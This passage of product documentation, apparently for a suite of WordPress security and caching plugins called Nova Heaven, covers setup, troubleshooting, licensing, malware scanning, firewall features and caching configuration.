 Nova Shield] Active - monitoring 9 surfaces
 

 If you see that, you're done. If not, see Troubleshooting below. 

 

 Configuration Options 

 Setting Default What it does Mode Learning Learning vs Active Protected Pages All Restrict to checkout/login only if needed Form Protection On Watches all <form> elements for tampering Link Integrity On Hashes outbound links and re-checks on click Script Hashing On Locks first-party JS to known-good hashes Report Only Off Sends alerts but never blocks (even in Active mode) Whitelist Domains empty Domains Shield should ignore (e.g. googletagmanager.com ) 

 

 Troubleshooting 

 ❌ Shield agent not loading 

 Check: 

 
 Is Nova Scan active? Shield requires Nova Scan + Nova Core both running. 

 Is your site behind a caching layer? Purge all 3 caches : Cloudflare, Hyper Nova, OPcache. 

 Open view-source: on your homepage and search for nova-shield . If missing, the agent script wasn't injected, check that Shield is enabled under Nova Scan settings. 
 

 ❌ CORS errors in browser console 

 Shield reports back to your own site's REST endpoint, so CORS is rare, but it can happen if your site has aggressive CORS headers or runs the frontend on a different domain than the WordPress backend (headless WP setups). 

 Fix: 

 
 Go to Nova Core → Settings → Auth & CORS 

 Add your frontend domain (e.g. https://example.com ) to Allowed Origins 

 Save and purge caches 
 

 If you see this in console: 

 Access to fetch at 'https://yoursite.com/wp-json/nova/v1/shield/report'
from origin 'https://yoursite.com' has been blocked by CORS policy
 

 …it usually means a security plugin (Wordfence, iThemes, etc.) is stripping the Access-Control-Allow-Origin header. Whitelist the /wp-json/nova/v1/shield/* route in that plugin. 

 ❌ Cloudflare blocking Shield reports 

 Cloudflare's bot management or WAF can flag Shield's POST reports as bot traffic. Symptoms: 

 
 Console shows 403 or 1010 errors when Shield tries to report 

 Shield Activity dashboard stays empty even though the agent is loaded 
 

 Fix: 

 
 Cloudflare Dashboard → Security → WAF → Custom Rules 

 Create a rule: (http.request.uri.path contains "/wp-json/nova/v1/shield") Action: Skip → All remaining custom rules + Bot Fight Mode 

 Also exclude the path from Cloudflare → Caching → Cache Rules so reports aren't cached. 

 If you use Cloudflare Bot Fight Mode , add /wp-json/nova/v1/shield/* to the bot exclusions. 

 Purge Cloudflare cache. 
 

 ❌ Too many false positives in Active Mode 

 You activated too early. Switch back to Learning Mode for another 7 days, then re-enable Active Mode. Shield needs to see all your site's normal patterns (Google Analytics, Tag Manager, third-party widgets, etc.) before it can tell what's anomalous. 

 ❌ Tag Manager / Analytics getting blocked 

 Add the third-party domain to Whitelist Domains : 

 
 googletagmanager.com 

 google-analytics.com 

 connect.facebook.net 

 cdn.cookielaw.org (OneTrust) 

 Any other trusted analytics/marketing tools 
 

 ❌ Forms breaking on checkout pages 

 WooCommerce / EDD checkout forms use dynamic field generation that can trip Shield. Fix: 

 
 Nova Scan → Shield → Protected Pages 

 Exclude /checkout/ and /cart/ if you're on Active Mode and seeing breakage 

 Or switch those pages to Report Only mode 
 

 ❌ Shield Activity dashboard empty 

 Check in this order: 

 
 Is the agent loaded? ( view-source: your homepage, search for nova-shield ) 

 Are reports reaching the server? (DevTools → Network → filter for shield/report ) 

 Is Cloudflare/WAF blocking the reports? (see Cloudflare section above) 

 Purge OPcache: sometimes the report endpoint is stale 
 

 

 Best Practices 

 
 Always start in Learning Mode for 7 days minimum. Skipping this guarantees false positives. 

 Whitelist your analytics/marketing stack before going Active. 

 Run Nova Scan + Shield together - Scan catches what's already there, Shield catches what tries to get in. 

 Check Shield Activity weekly during the first month to tune your whitelist. 

 Use Report Only mode on critical pages (checkout, login) for the first 2 weeks of Active Mode - you get alerts without breaking customers. 
 

 

 Common Question 

 Q: Does Shield slow down my site? A: The agent is ~9KB gzipped and runs after page load. Real-world impact is under 5ms on first paint. 

 Q: Does Shield work with HyperNova caching? A: Yes. Shield's agent is injected at render time and the report endpoint bypasses cache automatically. 

 Q: Will Shield see my visitors' personal data? A: No. Shield only hashes structural patterns (DOM shape, script hashes, form field counts). It never reads field values or sends content off-site. 

 Q: Can I run Shield without Nova Scan? A: No. Shield is a feature of Nova Scan and requires it active.

---

## Troubleshooting Common Issues

URL: https://novaheaven.io/en/codex/troubleshooting
Last updated: 2026-04-02

Solutions to the most common issues you might encounter when setting up and using Nova plugins. 
 
 License Activation Fails 
 "License verification failed" 
 
 Check your key:  Make sure you copied the full key including the prefix, with no extra spaces 
 Activate your site first:  On novaheaven.io, Divine Keys, make sure you added your site URL to the product before trying to activate in WordPress 
 URL mismatch:  The URL you activated on novaheaven.io must exactly match your WordPress site URL (including https:// and www if applicable). Check Settings → General in WordPress. 
 Outbound requests blocked:  Some hosts block outbound HTTPS requests from WordPress. Ask your host to whitelist lic.novaheaven.io 
 
 "Nova Core is required" 
 Every Nova plugin needs Nova Core active. Install and activate Nova Core before activating any other Nova plugin. 
 Scan Issues 
 Scan stops or times out 
 
 PHP time limit:  Deep scans on large sites may exceed your server time limit. Try a Quick or Standard scan first, or ask your host to increase the PHP time limit to 300 seconds. 
 Memory limit: The N-Dimensional Engine requires adequate memory. A minimum of 128MB is recommended; 256MB is ideal. Check your php.ini or ask your host. 
 
 NDE shows "Inactive" 
 The NDE needs to initialize on first run. This happens automatically when Nova Core verifies your license. If the engine stays inactive: 
 
 Go to Nova Core → Divine Keys and click Refresh 
 Wait 60 seconds, then reload the Nova Scan dashboard 
 If still inactive, check that your license is active and your site is activated for Nova Scan 
 
 Performance Issues 
 Admin pages load slowly 
 
 Large result sets:  If you have thousands of scan results, the Results tab may take a moment to load. This is normal for the first load. 
 Object cache:  If you have Redis or Memcached available, enable object caching in Hyper Nova for faster admin page loads. 
 
 Update Issues 
 "Download failed" when updating 
 
 Ensure Nova Core is active and your license is verified 
 Check that your server can reach dist.novaheaven.io over HTTPS 
 Try clicking Refresh on the Divine Keys page, then retry the update 
 
 Still Need Help? 
 If none of the above solutions resolve your issue: 
 
 Check the FAQ for additional answers 
 Contact us with your site URL, Nova Core version, and a description of the issue

---

## Understanding Your License

URL: https://novaheaven.io/en/codex/understanding-your-license
Last updated: 2026-04-02

Nova Heaven uses a single license key for your entire plugin suite. One key, all plugins, all sites. 
 
 How Licensing Works 
 When you register on novaheaven.io, you receive a single license key. This key governs access to every Nova plugin. 
 Your plan determines which products you can use and how many sites you can activate. 
 Plans and Tiers 
 Paid plans have tiers that control your site limit: 
 
 
 
 Tier 
 Sites 
 
 
 
 
 Alpha 
 1 site 
 
 
 Trinity 
 3 sites 
 
 
 Seraph 
 6 sites 
 
 
 Divine 
 9 sites 
 
 
 Omega 
 Unlimited 
 
 
 
 Nova Scan Is Always Free 
 Every Nova Heaven account includes a free Nova Scan license. No credit card required. The free plan includes the full NDE-powered scanner and community threat feed with no site limit . Free licenses are valid for 90 days at a time and can be renewed indefinitely at no cost. 
 Site Activation 
 Before a plugin works on a site, you need to activate that site for the specific product: 
 
 Go to your Divine Keys tab on novaheaven.io 
 Find the product card (e.g. Nova Scan) 
 Enter your site URL and click Add 
 
 Each site URL counts as one activation. On paid tiers, your total activations are capped by your tier limit. On the free Nova Scan plan, there is no cap. 
 Plugin-Side Verification 
 After entering your license key in Nova Core on your WordPress site, verification happens automatically: 
 
 Nova Core contacts the license server over encrypted HTTPS 
 Your key, site URL, and installed products are verified 
 The result is cached locally so your site works even if the license server is temporarily unreachable 
 Cache refreshes automatically for active licenses 
 
 Free License Renewal 
 Free licenses are valid for 90 days at a time. When your free license is within 7 days of expiring, a renewal button appears on your Divine Keys page. Click it to renew for another 90 days. Instant, no payment required. You can renew forever. 
 Moving to a New Server 
 If you migrate your WordPress site to a new host, Nova Core will automatically detect the server change on the next verification cycle. Your license stays valid.

---

## Firewall and Protections

URL: https://novaheaven.io/en/codex/firewall-and-protections
Last updated: 2026-04-02

Nova Scan includes a built-in Web Application Firewall (WAF) and multiple protection layers that block threats before they reach your site. 
 
 The Protections Tab 
 The Protections tab in Nova Scan is your control center for all active defense features. Each protection can be toggled independently. 
 Web Application Firewall (WAF) 
 The WAF inspects incoming HTTP requests in real time using the N-Dimensional Engine. It blocks: 
 
 SQL injection:  Malicious database queries in URL parameters, form data, and cookies 
 Cross-site scripting (XSS):  Script injection attempts in request payloads 
 Path traversal: Attempts to access files outside the web root 
 Remote code execution: Payloads designed to execute commands on your server 
 File inclusion attacks: Attempts to load malicious remote or local files 
 
 Brute Force Protection 
 Blocks repeated login attempts by tracking failed logins per IP address. After a configurable number of failures, the IP is temporarily locked out. This protects against automated password-guessing attacks. 
 Request Filtering 
 Filters suspicious request patterns including: 
 
 Unusually long query strings 
 Known malicious user agents 
 Requests to sensitive WordPress files 
 Null byte injection attempts 
 
 The Firewall Tab 
 The dedicated Firewall tab shows: 
 
 Blocked requests: A live count of threats stopped 
 Top attacking IPs:  Which addresses are targeting your site most 
 Block rules:  Custom IP and country-based blocking rules 
 Firewall log:  Recent blocked requests with full details 
 
 Nova Shield 
 Nova Shield is a cross-domain frontend security layer that protects your site visitors. It monitors your pages in the browser to detect: 
 
 DOM injection:  Unauthorized scripts or elements added to your pages 
 Script integrity violations: Modified or tampered JavaScript files 
 Suspicious redirects:  Attempts to redirect your visitors to malicious sites 
 
 Shield violations appear on the Shield tab in your Nova Scan dashboard with full details about what was detected and when.

---

## Scanning Your Site with Nova Scan

URL: https://novaheaven.io/en/codex/scanning-your-site
Last updated: 2026-04-02

Nova Scan detects malware, backdoors, and suspicious code across your entire WordPress installation. This guide covers scan profiles, understanding results, and taking action on threats. 
 
 Scan Profiles 
 Nova Scan offers three scan profiles, each covering a different scope: 
 Quick Scan 
 Checks your plugins , themes , and uploads directories. This is the fastest option and catches the most common attack vectors, injected plugin files, backdoor themes, and suspicious uploads. 
 Standard Scan 
 Covers the entire wp-content directory including mu-plugins, drop-ins, and any custom directories. Recommended for routine scanning. 
 Deep Scan 
 Scans your complete WordPress installation from the root directory down. This catches threats hidden in core files, wp-admin modifications, and root-level backdoors. Takes the longest but leaves nothing unchecked. 
 The N-Dimensional Engine 
 At the heart of Nova Scan is the NDE, a proprietary N-Dimensional detection engine that analyzes code at a level traditional scanners cannot reach. 
 Unlike conventional security plugins that rely on static virus definitions, the N-Dimensional Engine evaluates files across multiple dimensions simultaneously. It detects both known threats and zero-day attacks that have never been catalogued without needing constant definition updates. 
 The engine runs specialized analysis for PHP files, JavaScript files, database content, and firewall requests - each tuned for its own threat landscape. 
 Understanding Results 
 After a scan completes, the Results tab shows every finding with: 
 
 Severity level:  Critical (red), High (orange), Medium (yellow), or Low (blue) 
 NDE Confidence: A percentage showing how certain the engine is. Higher means more confident the file is malicious. 
 File path:  The exact location of the suspicious file 
 Detection method:  Whether it was caught by NDE analysis, pattern match, or both 
 
 Taking Action 
 For each finding, you can: 
 
 Quarantine: Moves the file to a safe, non-executable location. The file is preserved so you can restore it if needed. This is the safest first step. 
 Delete:  Permanently removes the file. Use this when you are certain the file is malicious. 
 Mark as Clean:  Tells Nova Scan this file is safe. It will not be flagged in future scans. Your vote also contributes to the community clean hash network, helping other Nova Scan users. 
 
 The Compare Tab 
 The Compare tab lets you diff any scanned file against its original version from the WordPress.org repository. This is invaluable for detecting injected code in core files, plugins, and themes, you can see exactly what changed. 
 Scheduled Scans 
 In Settings , you can configure Nova Scan to run automatically: 
 
 Choose daily, weekly, or custom intervals 
 Select which scan profile to use 
 Results appear in your dashboard on the next visit 
 
 For most sites, a daily Standard Scan provides excellent protection with minimal server impact.

---

## Your First 7 Minutes with Nova Heaven

URL: https://novaheaven.io/en/codex/getting-started
Last updated: 2026-04-02

From zero to a fully protected WordPress site in under 7 minutes. This guide walks you through every step to creating your account, activating your license, installing the plugins, and running your first scan. 

 

 Step 1: Create Your Free Account 

 
 Visit novaheaven.io/dashboard 

 Click the Register tab 

 Enter your email , display name , and choose a password (minimum 8 characters) 

 Click Create Account 
 

 You will see a confirmation screen asking you to check your email. 

 Step 2: Confirm Your Email 

 
 Open the confirmation email from Nova Heaven (check spam if it does not arrive within a few minutes) 

 Click the confirmation link, it takes you to a "Seal Verified" page 

 You are automatically redirected to your dashboard 
 

 What happened behind the scenes: A free Nova Scan license was created for you automatically. It is valid for 90 days and can be renewed for free, indefinitely. Just click the renew button on your Divine Keys page when it is close to expiring. There is no site limit on the free plan. 

 Step 3: Find Your License Key 

 
 In your dashboard, click the Divine Keys tab 

 Your license key is displayed at the top 

 Click the key to copy it to your clipboard, you will need it in the next step 
 

 The Divine Keys page also shows your plan, how many sites you have activated, and which products are available to you. 

 Step 4: Activate Your Site 

 Before installing anything on WordPress, tell Nova Heaven which site you want to protect: 

 
 On the Divine Keys page, find the Nova Scan product card 

 Type your site URL in the input field (e.g. https://yoursite.com ) 

 Click Add 
 

 Your site now appears under the Nova Scan card with a green status. You can add as many sites as you need on the free plan. 

 Step 5: Install Nova Core 

 Nova Core is required. Every Nova plugin depends on it for licensing, updates, and shared features. Install it first. 

 
 Download Nova Core from your Nova Heaven dashboard 

 In your WordPress admin, go to Plugins → Add New → Upload Plugin 

 Upload the Nova Core zip file 

 Click Install Now , then Activate 

 A new Nova Core menu appears in your WordPress sidebar 
 

 Step 6: Enter Your License Key 

 
 In WordPress admin, go to Nova Core → Divine Keys 

 Paste your license key into the input field 

 Click Activate 
 

 You should see a success message and your license details will appear, plan name, days remaining, and which products are entitled. 

 If you see an error, double-check that: 

 
 The key was copied correctly (no extra spaces) 

 You activated your site URL on the Divine Keys page in Step 4 

 Your site can make outbound HTTPS requests (some hosts block this) 
 

 Step 7: Install Nova Scan 

 Once Nova Core is active and your license is verified, installing Nova Scan is simple: 

 
 Go to Nova Core → Overview in your WordPress admin 

 In the plugin grid, find Nova Scan, it shows as "Not Installed" 

 Click View Nova Scan to download it from novaheaven.io 

 Upload the zip via Plugins → Add New → Upload Plugin and activate 
 

 Nova Scan will automatically register with Nova Core and verify your license. If everything is green, you are ready to scan. 

 After the initial install, all future updates are handled automatically through Nova Core, no more manual zip uploads. 

 Your First Scan 

 
 Go to Nova Core → Nova Scan 

 You land on the Dashboard tab, this shows your site health overview 

 Click the Scan tab 

 Choose a scan profile:
 
 Quick Scan:  checks plugins, themes, and uploads (fastest) 

 Standard Scan:  checks the full wp-content directory 

 Deep Scan: checks your entire WordPress installation 
 
 

 Click Start Scan 
 

 Nova Scan is powered by the N-Dimensional Engine, a proprietary detection engine built to identify both known and zero-day threats without relying on a traditional virus definition database. 

 Understanding Your Results 

 After the scan completes, switch to the Results tab. Each finding shows: 

 
 Severity: Critical, High, Medium, or Low 

 Confidence:  how certain the NDE is (0 to 100%) 

 File path: where the suspicious file lives 

 Detection type:  NDE detection, pattern match, or both 
 

 From here you can quarantine suspicious files (moves them to a safe location), delete confirmed threats, or mark as clean if you trust the file. 

 

 What Next? 

 
 Enable the Firewall:  Go to the Protections tab to activate WAF protection, brute-force blocking, and request filtering 

 Set Up Scheduled Scans:  In Settings, configure automatic daily or weekly scans 

 Explore the Dashboard: The main dashboard shows threat trends over time, scan history, and your overall site health score 

 Try Hyper Nova:  If you want performance optimization alongside security, upgrade your plan to add Hyper Nova caching 
 

 Need help? Visit the FAQ or contact us .

---

## Hyper Nova: Caching and Performance

URL: https://novaheaven.io/en/codex/hyper-nova-caching
Last updated: 2026-04-01

Hyper Nova is a high-performance caching engine for WordPress. It serves cached pages in microseconds, reduces server load, and works alongside Nova Scan to keep your site both fast and secure. 
 
 Installation 
 Hyper Nova requires Nova Core (like all Nova plugins). If you already have Nova Core installed and your license activated: 
 
 Download hyper-nova.zip from your Nova Heaven dashboard 
 Plugins → Add New → Upload Plugin → upload and activate 
 Hyper Nova appears under the Nova Core menu 
 
 How It Works 
 Hyper Nova creates static HTML snapshots of your pages and serves them directly, bypassing PHP and database queries entirely. When a visitor requests a page: 
 
 Hyper Nova checks if a fresh cached copy exists 
 If yes: serves it instantly (no PHP execution, no database queries) 
 If no: lets WordPress generate the page normally, then caches the result for next time 
 
 The Dashboard 
 Hyper Nova's dashboard shows real-time performance metrics: 
 
 Cache hit rate:  Percentage of requests served from cache 
 Response time:  Average page load time 
 Pages cached:  Total number of cached pages 
 Cache size: Disk space used by the cache 
 
 Cache Management 
 
 Purge All:  Clears the entire cache. Use after major site changes. 
 Purge URL:  Clear cache for a specific page 
 Auto-purge:  When you update a post or page, Hyper Nova automatically clears the cached version 
 
 Configuration 
 Key settings in the Settings tab: 
 
 Cache lifetime:  How long pages stay cached before regenerating 
 Exclusions:  URLs or patterns to never cache (e.g. cart, checkout, account pages) 
 Mobile caching:  Separate cache for mobile devices if your theme serves different markup 
 Logged-in users:  Whether to serve cached pages to logged-in users 
 
 Redis Object Cache 
 If your host provides Redis, Hyper Nova can use it as an object cache backend. This speeds up database queries for dynamic pages that cannot be fully cached (admin pages, WooCommerce carts, etc.). 
 Enable Redis in Settings → Object Cache and enter your Redis connection details.

---

## Nova Core: The Foundation

URL: https://novaheaven.io/en/codex/nova-core-foundation
Last updated: 2026-04-01

Nova Core is the shared foundation that powers every Nova plugin. It handles licensing, plugin updates, shared UI, and cross-plugin communication. 
 
 Why Nova Core Is Required 
 Every Nova plugin requires Nova Core to function. Without it, plugins cannot verify licenses, receive updates, or access shared features. If Nova Core is deactivated, all dependent plugins will show a notice and disable their features until it is reactivated. 
 What Nova Core Provides 
 
 License management:  Enter one key, activate all your plugins 
 Automatic updates:  Secure, signed plugin updates delivered directly from Nova Heaven 
 Shared admin framework:  Consistent dark-themed UI across all Nova plugins 
 Nova Pulse:  Security bulletins, release announcements, and system broadcasts 
 
 Installation 
 
 Download nova-core.zip from your Nova Heaven dashboard 
 In WordPress admin: Plugins → Add New → Upload Plugin 
 Upload the zip, click Install Now , then Activate 
 
 After activation, you will see the Nova Core menu in your WordPress sidebar with the starburst icon. 
 The Dashboard 
 Nova Core's dashboard shows: 
 
 Installed plugins:  A grid of all detected Nova plugins and their status 
 License summary: Your current plan, tier, and days remaining 
 Nova Pulse feed:  Latest broadcasts from the Nova Heaven team 
 
 Divine Keys Page 
 This is where you manage your license on the WordPress side: 
 
 Enter or change your license key 
 View plan details, site count, and expiration 
 See which products are activated on this site 
 Activate or deactivate individual products 
 Force-refresh your license verification 
 
 Plugin Updates 
 Nova Core handles updates for all Nova plugins through a secure pipeline: 
 
 Update checks happen automatically every 6 hours 
 When an update is available, it appears in the standard WordPress updates screen 
 Downloads use one-time signed URLs that expire in 15 minutes 
 Each download URL can only be used once 
 
 You can also check for updates manually from the Nova Core dashboard.

---